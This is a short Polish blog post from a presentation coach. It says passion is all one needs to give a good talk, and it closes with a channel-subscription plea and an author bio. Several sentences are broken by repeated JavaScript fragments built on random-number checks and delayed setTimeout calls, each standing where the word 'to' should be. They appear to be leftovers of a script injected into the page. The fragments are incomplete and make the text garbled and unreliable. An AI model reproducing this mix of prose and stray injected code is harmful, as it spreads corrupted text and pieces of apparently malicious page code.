Możesz wygłosić świetną prezentację, nawet jeśli jesteś kiepskim mówcą

Aby wygłosić świetną prezentację potrzebujesz tylko jednego…

Możesz zapoznać się z treścią nagrania w formie artykułu, klikając czytaj dalej:

Nie musisz być specjalistą od wystąpień publicznych. Nie musisz znać wszystkich “chwytów i sztuczek” profesjonalnych mówców. Do wygłoszenia świetnej prezentacji potrzebujesz tylko jednej rzeczy:
Pasji!!!
Jeśli w swoich wystąpieniach będziesz mówił z pozytywnymi emocjami, będziesz sobą, będziesz dawał całego siebie, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ludzie Cię pokochają 😉

Oczywiście musisz pamiętać o tym, że nie wszystkim przypadniesz do gustu Ty oraz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, co masz do powiedzenia ale dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to normalne. Nie przejmuj się. Jeśli dzięki Twojej prezentacji bądź filmowi na You Tube zyska choć jedna osoba, masz sukces!

Jeśli film Ci się spodobał, subskrybuj mój kanał na YT, kliknij w “Lubię dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”

W filmie wykorzystałem nagranie Cool Funk, Kevina MacLeoda. Licencja Royalty free Music

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply